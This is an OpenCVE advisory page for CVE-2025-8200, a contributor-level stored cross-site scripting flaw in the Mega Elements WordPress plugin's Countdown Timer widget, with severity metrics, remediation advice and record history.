Description
The Mega Elements – Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown Timer widget in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2025-09-26
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting (XSS) in plugin pages
Action: Immediate Patch
AI Analysis

Impact

The vulnerability arises from the Mega Elements – Addons for Elementor plugin’s Countdown Timer widget, which fails to sanitize user supplied attributes and to escape output in its stored content. This is a CWE‑79 stored cross‑site scripting flaw. Authenticated users who have contributor-level permissions can insert arbitrary JavaScript into the widget’s configuration, and the malicious payload is stored in the database. When any visitor subsequently loads a page containing the compromised widget, the injected script executes in the visitor’s browser context, potentially enabling session hijacking, defacement, or unauthorized content manipulation.

Affected Systems

WordPress sites that have installed Mega Elements – Addons for Elementor versions 1.3.2 or older are affected. The plugin’s Countdown Timer widget must be present on at least one page or post for the stored XSS to be exploitable. Sites running newer releases (1.3.3 and above) are not vulnerable.

Risk and Exploitability

The CVSS score of 6.4 classifies this issue as a moderate severity flaw. The EPSS score of less than 1% indicates a very low probability of observed exploitation at present. The vulnerability is not listed in the CISA KEV catalog. Exploitation requires an authenticated contributor or higher; an attacker can therefore achieve the attack only after acquiring legitimate access to the administrative interface, typically through credential compromise or social engineering. Backed by the provided data, the most straightforward path for an attacker is to edit an existing Countdown Timer widget via the WordPress editor, supply a malicious script payload, and then publish the changes. Once one of the affected pages is accessed by site users, the stored payload will run, potentially spreading the impact to all visitors.

Generated by OpenCVE AI on April 20, 2026 at 21:45 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update Mega Elements – Addons for Elementor to the latest version (≥ 1.3.3) to remove the vulnerability.
  • Disable or delete the Countdown Timer widget from all pages and posts where possible, preventing the storage of malicious scripts.
  • Restrict contributor-level permissions or review role assignments on the site to limit users who can edit widgets until the plugin is updated.

Generated by OpenCVE AI on April 20, 2026 at 21:45 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-31202 The Mega Elements – Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown Timer widget in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
History

Fri, 26 Sep 2025 20:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 26 Sep 2025 11:45:00 +0000

Type Values Removed Values Added
First Time appeared Elementor
Elementor elementor
Kraftplugins
Kraftplugins mega Elements
Wordpress
Wordpress wordpress
Vendors & Products Elementor
Elementor elementor
Kraftplugins
Kraftplugins mega Elements
Wordpress
Wordpress wordpress

Fri, 26 Sep 2025 02:15:00 +0000

Type Values Removed Values Added
Description The Mega Elements – Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown Timer widget in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Title Mega Elements – Addons for Elementor <= 1.3.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Countdown Timer Widget
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}

Subscriptions

Elementor Elementor
Kraftplugins Mega Elements
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T17:13:57.642Z

Reserved: 2025-07-25T16:50:33.418Z

Link: CVE-2025-8200

cve-icon Vulnrichment

Updated: 2025-09-26T19:23:50.929Z

cve-icon NVD

Status : Deferred

Published: 2025-09-26T02:15:52.497

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-8200

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-20T22:00:11Z

Weaknesses